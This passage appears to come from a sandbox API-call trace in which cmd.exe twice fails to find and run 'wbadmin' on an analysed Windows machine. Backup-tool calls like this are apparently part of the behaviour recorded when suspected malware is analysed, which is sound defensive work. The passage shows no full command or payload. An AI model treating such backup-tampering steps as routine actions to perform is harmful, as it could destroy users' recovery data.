lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1c [0163.762] malloc (_Size=0xffce) returned 0x2127e0 [0163.762] ??_V@YAXPAX@Z () returned 0xb9f5f4 [0163.762] malloc (_Size=0xffce) returned 0x2227b8 [0163.762] ??_V@YAXPAX@Z () returned 0xb9f3ac [0163.762] _wcsicmp (_String1="wbadmin", _String2="DIR") returned 19 [0163.762] _wcsicmp (_String1="wbadmin", _String2="ERASE") returned 18 [0163.762] _wcsicmp (_String1="wbadmin", _String2="DEL") returned 19 [0163.762] _wcsicmp (_String1="wbadmin", _String2="TYPE") returned 3 [0163.762] _wcsicmp (_String1="wbadmin", _String2="COPY") returned 20 [0163.762] _wcsicmp (_String1="wbadmin", _String2="CD") returned 20 [0163.762] _wcsicmp (_String1="wbadmin", _String2="CHDIR") returned 20 [0163.762] _wcsicmp (_String1="wbadmin", _String2="RENAME") returned 5 [0163.762] _wcsicmp (_String1="wbadmin", _String2="REN") returned 5 [0163.762] _wcsicmp (_String1="wbadmin", _String2="ECHO") returned 18 [0163.762] _wcsicmp (_String1="wbadmin", _String2="SET") returned 4 [0163.762] _wcsicmp (_String1="wbadmin", _String2="PAUSE") returned 7 [0163.762] _wcsicmp (_String1="wbadmin", _String2="DATE") returned 19 [0163.762] _wcsicmp (_String1="wbadmin", _String2="TIME") returned 3 [0163.762] _wcsicmp (_String1="wbadmin", _String2="PROMPT") returned 7 [0163.762] _wcsicmp (_String1="wbadmin", _String2="MD") returned 10 [0163.762] _wcsicmp (_String1="wbadmin", _String2="MKDIR") returned 10 [0163.763] _wcsicmp (_String1="wbadmin", _String2="RD") returned 5 [0163.763] _wcsicmp (_String1="wbadmin", _String2="RMDIR") returned 5 [0163.763] _wcsicmp (_String1="wbadmin", _String2="PATH") returned 7 [0163.763] _wcsicmp (_String1="wbadmin", _String2="GOTO") returned 16 [0163.763] _wcsicmp (_String1="wbadmin", _String2="SHIFT") returned 4 [0163.763] _wcsicmp (_String1="wbadmin", _String2="CLS") returned 20 [0163.763] _wcsicmp (_String1="wbadmin", _String2="CALL") returned 20 [0163.763] _wcsicmp (_String1="wbadmin", _String2="VERIFY") returned 1 [0163.763] _wcsicmp (_String1="wbadmin", _String2="VER") returned 1 [0163.763] _wcsicmp (_String1="wbadmin", _String2="VOL") returned 1 [0163.763] _wcsicmp (_String1="wbadmin", _String2="EXIT") returned 18 [0163.763] _wcsicmp (_String1="wbadmin", _String2="SETLOCAL") returned 4 [0163.763] _wcsicmp (_String1="wbadmin", _String2="ENDLOCAL") returned 18 [0163.763] _wcsicmp (_String1="wbadmin", _String2="TITLE") returned 3 [0163.763] _wcsicmp (_String1="wbadmin", _String2="START") returned 4 [0163.763] _wcsicmp (_String1="wbadmin", _String2="DPATH") returned 19 [0163.763] _wcsicmp (_String1="wbadmin", _String2="KEYS") returned 12 [0163.763] _wcsicmp (_String1="wbadmin", _String2="MOVE") returned 10 [0163.763] _wcsicmp (_String1="wbadmin", _String2="PUSHD") returned 7 [0163.763] _wcsicmp (_String1="wbadmin", _String2="POPD") returned 7 [0163.763] _wcsicmp (_String1="wbadmin", _String2="ASSOC") returned 22 [0163.763] _wcsicmp (_String1="wbadmin", _String2="FTYPE") returned 17 [0163.763] _wcsicmp (_String1="wbadmin", _String2="BREAK") returned 21 [0163.763] _wcsicmp (_String1="wbadmin", _String2="COLOR") returned 20 [0163.763] _wcsicmp (_String1="wbadmin", _String2="MKLINK") returned 10 [0163.763] _wcsicmp (_String1="wbadmin", _String2="DIR") returned 19 [0163.763] _wcsicmp (_String1="wbadmin", _String2="ERASE") returned 18 [0163.763] _wcsicmp (_String1="wbadmin", _String2="DEL") returned 19 [0163.763] _wcsicmp (_String1="wbadmin", _String2="TYPE") returned 3 [0163.763] _wcsicmp (_String1="wbadmin", _String2="COPY") returned 20 [0163.763] _wcsicmp (_String1="wbadmin", _String2="CD") returned 20 [0163.763] _wcsicmp (_String1="wbadmin", _String2="CHDIR") returned 20 [0163.763] _wcsicmp (_String1="wbadmin", _String2="RENAME") returned 5 [0163.763] _wcsicmp (_String1="wbadmin", _String2="REN") returned 5 [0163.763] _wcsicmp (_String1="wbadmin", _String2="ECHO") returned 18 [0163.763] _wcsicmp (_String1="wbadmin", _String2="SET") returned 4 [0163.763] _wcsicmp (_String1="wbadmin", _String2="PAUSE") returned 7 [0163.764] _wcsicmp (_String1="wbadmin", _String2="DATE") returned 19 [0163.764] _wcsicmp (_String1="wbadmin", _String2="TIME") returned 3 [0163.764] _wcsicmp (_String1="wbadmin", _String2="PROMPT") returned 7 [0163.764] _wcsicmp (_String1="wbadmin", _String2="MD") returned 10 [0163.764] _wcsicmp (_String1="wbadmin", _String2="MKDIR") returned 10 [0163.764] _wcsicmp (_String1="wbadmin", _String2="RD") returned 5 [0163.764] _wcsicmp (_String1="wbadmin", _String2="RMDIR") returned 5 [0163.764] _wcsicmp (_String1="wbadmin", _String2="PATH") returned 7 [0163.764] _wcsicmp (_String1="wbadmin", _String2="GOTO") returned 16 [0163.764] _wcsicmp (_String1="wbadmin", _String2="SHIFT") returned 4 [0163.764] _wcsicmp (_String1="wbadmin", _String2="CLS") returned 20 [0163.764] _wcsicmp (_String1="wbadmin", _String2="CALL") returned 20 [0163.764] _wcsicmp (_String1="wbadmin", _String2="VERIFY") returned 1 [0163.764] _wcsicmp (_String1="wbadmin", _String2="VER") returned 1 [0163.764] _wcsicmp (_String1="wbadmin", _String2="VOL") returned 1 [0163.764] _wcsicmp (_String1="wbadmin", _String2="EXIT") returned 18 [0163.764] _wcsicmp (_String1="wbadmin", _String2="SETLOCAL") returned 4 [0163.764] _wcsicmp (_String1="wbadmin", _String2="ENDLOCAL") returned 18 [0163.764] _wcsicmp (_String1="wbadmin", _String2="TITLE") returned 3 [0163.764] _wcsicmp (_String1="wbadmin", _String2="START") returned 4 [0163.764] _wcsicmp (_String1="wbadmin", _String2="DPATH") returned 19 [0163.764] _wcsicmp (_String1="wbadmin", _String2="KEYS") returned 12 [0163.764] _wcsicmp (_String1="wbadmin", _String2="MOVE") returned 10 [0163.764] _wcsicmp (_String1="wbadmin", _String2="PUSHD") returned 7 [0163.764] _wcsicmp (_String1="wbadmin", _String2="POPD") returned 7 [0163.764] _wcsicmp (_String1="wbadmin", _String2="ASSOC") returned 22 [0163.764] _wcsicmp (_String1="wbadmin", _String2="FTYPE") returned 17 [0163.764] _wcsicmp (_String1="wbadmin", _String2="BREAK") returned 21 [0163.764] _wcsicmp (_String1="wbadmin", _String2="COLOR") returned 20 [0163.764] _wcsicmp (_String1="wbadmin", _String2="MKLINK") returned 10 [0163.764] _wcsicmp (_String1="wbadmin", _String2="FOR") returned 17 [0163.764] _wcsicmp (_String1="wbadmin", _String2="IF") returned 14 [0163.764] _wcsicmp (_String1="wbadmin", _String2="REM") returned 5 [0163.764] ??_V@YAXPAX@Z () returned 0x1 [0163.765] GetProcessHeap () returned 0x100000 [0163.765] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0xffd6) returned 0x16cda8 [0163.765] GetProcessHeap () returned 0x100000 [0163.765] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x6e) returned 0x100520 [0163.765] _wcsnicmp (_String1="wbad", _String2="cmd ", _MaxCount=0x4) returned 20 [0163.765] malloc (_Size=0xffce) returned 0x2227b8 [0163.765] ??_V@YAXPAX@Z () returned 0xb9f12c [0163.765] GetProcessHeap () returned 0x100000 [0163.765] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x1ffa4) returned 0x17cd88 [0163.766] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x17cd90, lpFilePart=0xb9f14c | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xb9f14c*="Desktop") returned 0x17 [0163.766] SetErrorMode (uMode=0x0) returned 0x1 [0163.766] GetProcessHeap () returned 0x100000 [0163.766] RtlReAllocateHeap (Heap=0x100000, Flags=0x0, Ptr=0x17cd88, Size=0x48) returned 0x17cd88 [0163.766] GetProcessHeap () returned 0x100000 [0163.766] RtlSizeHeap (HeapHandle=0x100000, Flags=0x0, MemoryPointer=0x17cd88) returned 0x48 [0163.766] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xfbf840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0163.766] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0163.766] GetProcessHeap () returned 0x100000 [0163.766] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x1b4) returned 0x118938 [0163.766] GetProcessHeap () returned 0x100000 [0163.766] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x360) returned 0x118af8 [0163.766] GetProcessHeap () returned 0x100000 [0163.766] RtlReAllocateHeap (Heap=0x100000, Flags=0x0, Ptr=0x118af8, Size=0x1b6) returned 0x118af8 [0163.766] GetProcessHeap () returned 0x100000 [0163.766] RtlSizeHeap (HeapHandle=0x100000, Flags=0x0, MemoryPointer=0x118af8) returned 0x1b6 [0163.766] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xfbf840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0163.766] GetProcessHeap () returned 0x100000 [0163.766] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0xe0) returned 0x118cb8 [0163.766] GetProcessHeap () returned 0x100000 [0163.766] RtlReAllocateHeap (Heap=0x100000, Flags=0x0, Ptr=0x118cb8, Size=0x76) returned 0x118cb8 [0163.766] GetProcessHeap () returned 0x100000 [0163.766] RtlSizeHeap (HeapHandle=0x100000, Flags=0x0, MemoryPointer=0x118cb8) returned 0x76 [0163.766] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0163.766] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0xb9eed8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9eed8) returned 0xffffffff [0163.767] GetLastError () returned 0x2 [0163.767] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0163.767] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0xb9eed8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9eed8) returned 0xffffffff [0163.767] GetLastError () returned 0x2 [0163.767] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0163.767] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0xb9eed8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9eed8) returned 0xffffffff [0163.767] GetLastError () returned 0x2 [0163.767] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0163.767] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0xb9eed8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9eed8) returned 0xffffffff [0163.767] GetLastError () returned 0x2 [0163.767] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0163.768] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0xb9eed8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9eed8) returned 0xffffffff [0163.768] GetLastError () returned 0x2 [0163.768] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0163.768] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0xb9eed8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9eed8) returned 0xffffffff [0163.768] GetLastError () returned 0x2 [0163.768] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0163.768] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0xb9eed8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9eed8) returned 0xffffffff [0163.768] GetLastError () returned 0x2 [0163.768] ??_V@YAXPAX@Z () returned 0x1 [0163.768] _get_osfhandle (_FileHandle=2) returned 0x94 [0163.768] GetFileType (hFile=0x94) returned 0x2 [0163.768] GetStdHandle (nStdHandle=0xfffffff4) returned 0x94 [0163.768] GetConsoleMode (in: hConsoleHandle=0x94, lpMode=0xb9f324 | out: lpMode=0xb9f324) returned 1 [0163.774] _get_osfhandle (_FileHandle=2) returned 0x94 [0163.774] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x94, lpConsoleScreenBufferInfo=0xb9f374 | out: lpConsoleScreenBufferInfo=0xb9f374) returned 1 [0163.828] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0xfcb990, nSize=0x2000, Arguments=0x0 | out: lpBuffer="'%1' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x5d [0163.828] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0xfcb990, nSize=0x2000, Arguments=0xb9f3a4 | out: lpBuffer="'wbadmin' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x62 [0163.828] WriteConsoleW (in: hConsoleOutput=0x94, lpBuffer=0xfcb990*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0xb9f358, lpReserved=0x0 | out: lpBuffer=0xfcb990*, lpNumberOfCharsWritten=0xb9f358*=0x62) returned 1 [0163.919] ??_V@YAXPAX@Z () returned 0x1 [0163.919] GetConsoleTitleW (in: lpConsoleTitle=0xb9f868, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1c [0164.024] malloc (_Size=0xffce) returned 0x2127e0 [0164.024] ??_V@YAXPAX@Z () returned 0xb9f5f4 [0164.024] malloc (_Size=0xffce) returned 0x2227b8 [0164.024] ??_V@YAXPAX@Z () returned 0xb9f3ac [0164.024] _wcsicmp (_String1="wbadmin", _String2="DIR") returned 19 [0164.024] _wcsicmp (_String1="wbadmin", _String2="ERASE") returned 18 [0164.024] _wcsicmp (_String1="wbadmin", _String2="DEL") returned 19 [0164.024] _wcsicmp (_String1="wbadmin", _String2="TYPE") returned 3 [0164.024] _wcsicmp (_String1="wbadmin", _String2="COPY") returned 20 [0164.024] _wcsicmp (_String1="wbadmin", _String2="CD") returned 20 [0164.024] _wcsicmp (_String1="wbadmin", _String2="CHDIR") returned 20 [0164.024] _wcsicmp (_String1="wbadmin", _String2="RENAME") returned 5 [0164.024] _wcsicmp (_String1="wbadmin", _String2="REN") returned 5 [0164.024] _wcsicmp (_String1="wbadmin", _String2="ECHO") returned 18 [0164.024] _wcsicmp (_String1="wbadmin", _String2="SET") returned 4 [0164.024] _wcsicmp (_String1="wbadmin", _String2="PAUSE") returned 7 [0164.024] _wcsicmp (_String1="wbadmin", _String2="DATE") returned 19 [0164.024] _wcsicmp (_String1="wbadmin", _String2="TIME") returned 3 [0164.024] _wcsicmp (_String1="wbadmin", _String2="PROMPT") returned 7 [0164.024] _wcsicmp (_String1="wbadmin", _String2="MD") returned 10 [0164.024] _wcsicmp (_String1="wbadmin", _String2="MKDIR") returned 10 [0164.024] _wcsicmp (_String1="wbadmin", _String2="RD") returned 5 [0164.025] _wcsicmp (_String1="wbadmin", _String2="RMDIR") returned 5 [0164.025] _wcsicmp (_String1="wbadmin", _String2="PATH") returned 7 [0164.025] _wcsicmp (_String1="wbadmin", _String2="GOTO") returned 16 [0164.025] _wcsicmp (_String1="wbadmin", _String2="SHIFT") returned 4 [0164.025] _wcsicmp (_String1="wbadmin", _String2="CLS") returned 20 [0164.025] _wcsicmp (_String1="wbadmin", _String2="CALL") returned 20 [0164.025] _wcsicmp (_String1="wbadmin", _String2="VERIFY") returned 1 [0164.025] _wcsicmp (_String1="wbadmin", _String2="VER") returned 1 [0164.025] _wcsicmp (_String1="wbadmin", _String2="VOL") returned 1 [0164.025] _wcsicmp (_String1="wbadmin", _String2="EXIT") returned 18 [0164.025] _wcsicmp (_String1="wbadmin", _String2="SETLOCAL") returned 4 [0164.025] _wcsicmp (_String1="wbadmin", _String2="ENDLOCAL") returned 18 [0164.025] _wcsicmp (_String1="wbadmin", _String2="TITLE") returned 3 [0164.025] _wcsicmp (_String1="wbadmin", _String2="START") returned 4 [0164.025] _wcsicmp (_String1="wbadmin", _String2="DPATH") returned 19 [0164.025] _wcsicmp (_String1="wbadmin", _String2="KEYS") returned 12 [0164.025] _wcsicmp (_String1="wbadmin", _String2="MOVE") returned 10 [0164.025] _wcsicmp (_String1="wbadmin", _String2="PUSHD") returned 7 [0164.025] _wcsicmp (_String1="wbadmin", _String2="POPD") returned 7 [0164.025] _wcsicmp (_String1="wbadmin", _String2="ASSOC") returned 22 [0164.025] _wcsicmp (_String1="wbadmin", _String2="FTYPE") returned 17 [0164.025] _wcsicmp (_String1="wbadmin", _String2="BREAK") returned 21 [0164.025] _wcsicmp (_String1="wbadmin", _String2="COLOR") returned 20 [0164.025] _wcsicmp (_String1="wbadmin", _String2="MKLINK") returned 10 [0164.025] _wcsicmp (_String1="wbadmin", _String2="DIR") returned 19 [0164.025] _wcsicmp (_String1="wbadmin", _String2="ERASE") returned 18 [0164.025] _wcsicmp (_String1="wbadmin", _String2="DEL") returned 19 [0164.025] _wcsicmp (_String1="wbadmin", _String2="TYPE") returned 3 [0164.025] _wcsicmp (_String1="wbadmin", _String2="COPY") returned 20 [0164.025] _wcsicmp (_String1="wbadmin", _String2="CD") returned 20 [0164.025] _wcsicmp (_String1="wbadmin", _String2="CHDIR") returned 20 [0164.025] _wcsicmp (_String1="wbadmin", _String2="RENAME") returned 5 [0164.025] _wcsicmp (_String1="wbadmin", _String2="REN") returned 5 [0164.025] _wcsicmp (_String1="wbadmin", _String2="ECHO") returned 18 [0164.025] _wcsicmp (_String1="wbadmin", _String2="SET") returned 4 [0164.026] _wcsicmp (_String1="wbadmin", _String2="PAUSE") returned 7 [0164.026] _wcsicmp (_String1="wbadmin", _String2="DATE") returned 19 [0164.026] _wcsicmp (_String1="wbadmin", _String2="TIME") returned 3 [0164.026] _wcsicmp (_String1="wbadmin", _String2="PROMPT") returned 7 [0164.026] _wcsicmp (_String1="wbadmin", _String2="MD") returned 10 [0164.026] _wcsicmp (_String1="wbadmin", _String2="MKDIR") returned 10 [0164.026] _wcsicmp (_String1="wbadmin", _String2="RD") returned 5 [0164.026] _wcsicmp (_String1="wbadmin", _String2="RMDIR") returned 5 [0164.026] _wcsicmp (_String1="wbadmin", _String2="PATH") returned 7 [0164.026] _wcsicmp (_String1="wbadmin", _String2="GOTO") returned 16 [0164.026] _wcsicmp (_String1="wbadmin", _String2="SHIFT") returned 4 [0164.026] _wcsicmp (_String1="wbadmin", _String2="CLS") returned 20 [0164.026] _wcsicmp (_String1="wbadmin", _String2="CALL") returned 20 [0164.026] _wcsicmp (_String1="wbadmin", _String2="VERIFY") returned 1 [0164.026] _wcsicmp (_String1="wbadmin", _String2="VER") returned 1 [0164.026] _wcsicmp (_String1="wbadmin", _String2="VOL") returned 1 [0164.026] _wcsicmp (_String1="wbadmin", _String2="EXIT") returned 18 [0164.026] _wcsicmp (_String1="wbadmin", _String2="SETLOCAL") returned 4 [0164.026] _wcsicmp (_String1="wbadmin", _String2="ENDLOCAL") returned 18 [0164.026] _wcsicmp (_String1="wbadmin", _String2="TITLE") returned 3 [0164.026] _wcsicmp (_String1="wbadmin", _String2="START") returned 4 [0164.026] _wcsicmp (_String1="wbadmin", _String2="DPATH") returned 19 [0164.026] _wcsicmp (_String1="wbadmin", _String2="KEYS") returned 12 [0164.026] _wcsicmp (_String1="wbadmin", _String2="MOVE") returned 10 [0164.026] _wcsicmp (_String1="wbadmin", _String2="PUSHD") returned 7 [0164.026] _wcsicmp (_String1="wbadmin", _String2="POPD") returned 7 [0164.026] _wcsicmp (_String1="wbadmin", _String2="ASSOC") returned 22 [0164.026] _wcsicmp (_String1="wbadmin", _String2="FTYPE") returned 17 [0164.026] _wcsicmp (_String1="wbadmin", _String2="BREAK") returned 21 [0164.026] _wcsicmp (_String1="wbadmin", _String2="COLOR") returned 20 [0164.026] _wcsicmp (_String1="wbadmin", _String2="MKLINK") returned 10 [0164.026] _wcsicmp (_String1="wbadmin", _String2="FOR") returned 17 [0164.026] _wcsicmp (_String1="wbadmin", _String2="IF") returned 14 [0164.026] _wcsicmp (_String1="wbadmin", _String2="REM") returned 5 [0164.026] ??_V@YAXPAX@Z () returned 0x1 [0164.027] GetProcessHeap () returned 0x100000 [0164.027] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0xffd6) returned 0x17cdd8 [0164.027] GetProcessHeap () returned 0x100000 [0164.027] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x36) returned 0x105ab0 [0164.027] _wcsnicmp (_String1="wbad", _String2="cmd ", _MaxCount=0x4) returned 20 [0164.027] malloc (_Size=0xffce) returned 0x2227b8 [0164.027] ??_V@YAXPAX@Z () returned 0xb9f12c [0164.027] GetProcessHeap () returned 0x100000 [0164.027] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x1ffa4) returned 0x18cdb8 [0164.028] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x18cdc0, lpFilePart=0xb9f14c | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xb9f14c*="Desktop") returned 0x17 [0164.028] SetErrorMode (uMode=0x0) returned 0x1 [0164.028] GetProcessHeap () returned 0x100000 [0164.028] RtlReAllocateHeap (Heap=0x100000, Flags=0x0, Ptr=0x18cdb8, Size=0x48) returned 0x18cdb8 [0164.028] GetProcessHeap () returned 0x100000 [0164.028] RtlSizeHeap (HeapHandle=0x100000, Flags=0x0, MemoryPointer=0x18cdb8) returned 0x48 [0164.028] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xfbf840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0164.028] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0164.028] GetProcessHeap () returned 0x100000 [0164.028] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x1b4) returned 0x118d38 [0164.028] GetProcessHeap () returned 0x100000 [0164.028] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x360) returned 0x18ce08 [0164.029] GetProcessHeap () returned 0x100000 [0164.029] RtlReAllocateHeap (Heap=0x100000, Flags=0x0, Ptr=0x18ce08, Size=0x1b6) returned 0x18ce08 [0164.029] GetProcessHeap () returned 0x100000 [0164.029] RtlSizeHeap (HeapHandle=0x100000, Flags=0x0, MemoryPointer=0x18ce08) returned 0x1b6 [0164.029] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xfbf840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0164.029] GetProcessHeap () returned 0x100000 [0164.029] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0xe0) returned 0x118ef8 [0164.029] GetProcessHeap () returned 0x100000 [0164.029] RtlReAllocateHeap (Heap=0x100000, Flags=0x0, Ptr=0x118ef8, Size=0x76) returned 0x118ef8 [0164.029] GetProcessHeap () returned 0x100000 [0164.029] RtlSizeHeap (HeapHandle=0x100000, Flags=0x0, MemoryPointer=0x118ef8) returned 0x76 [0164.029] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0164.029] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0xb9eed8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9eed8) returned 0xffffffff [0164.029] GetLastError () returned 0x2 [0164.029] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0164.029] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0xb9eed8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9eed8) returned 0xffffffff [0164.029] GetLastError () returned 0x2 [0164.030] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0164.030] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0xb9eed8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9eed8) returned 0xffffffff [0164.030] GetLastError () returned 0x2 [0164.030] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0164.030] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0xb9eed8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9eed8) returned 0xffffffff [0164.030] GetLastError () returned 0x2 [0164.030] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0164.030] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0xb9eed8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9eed8) returned 0xffffffff [0164.030] GetLastError () returned 0x2 [0164.030] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0164.030] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0xb9eed8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9eed8) returned 0xffffffff [0164.031] GetLastError () returned 0x2 [0164.031] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0164.031] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0xb9eed8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9eed8) returned 0xffffffff [0164.031] GetLastError () returned 0x2 [0164.031] ??_V@YAXPAX@Z () returned 0x1 [0164.031] _get_osfhandle (_FileHandle=2) returned 0x94 [0164.031] GetFileType (hFile=0x94) returned 0x2 [0164.031] GetStdHandle (nStdHandle=0xfffffff4) returned 0x94 [0164.031] GetConsoleMode (in: hConsoleHandle=0x94, lpMode=0xb9f324 | out: lpMode=0xb9f324) returned 1 [0164.161] _get_osfhandle (_FileHandle=2) returned 0x94 [0164.161] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x94, lpConsoleScreenBufferInfo=0xb9f374 | out: lpConsoleScreenBufferInfo=0xb9f374) returned 1 [0164.272] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0xfcb990, nSize=0x2000, Arguments=0x0 | out: lpBuffer="'%1' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x5d [0164.272] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0xfcb990, nSize=0x2000, Arguments=0xb9f3a4 | out: lpBuffer="'wbadmin' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x62 [0164.272] WriteConsoleW (in: hConsoleOutput=0x94, lpBuffer=0xfcb990*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0xb9f358, lpReserved=0x0 | out: lpBuffer=0xfcb990*, lpNumberOfCharsWritten=0xb9f358*=0x62) returned 1 [0164.366] ??_V@YAXPAX@Z () returned 0x1 [0164.366] _get_osfhandle (_FileHandle=1) returned 0x90 [0164.366] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x3) returned 1 [0164.476] _get_osfhandle (_FileHandle=1) returned 0x90 [0164.476] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xfc3890 | out: lpMode=0xfc3890) returned 1 [0164.583] _get_osfhandle (_FileHandle=1) returned 0x90 [0164.583] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x7) returned 1 [0164.741] _get_osfhandle (_FileHandle=0) returned 0x8c [0164.741] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xfc3894 | out: 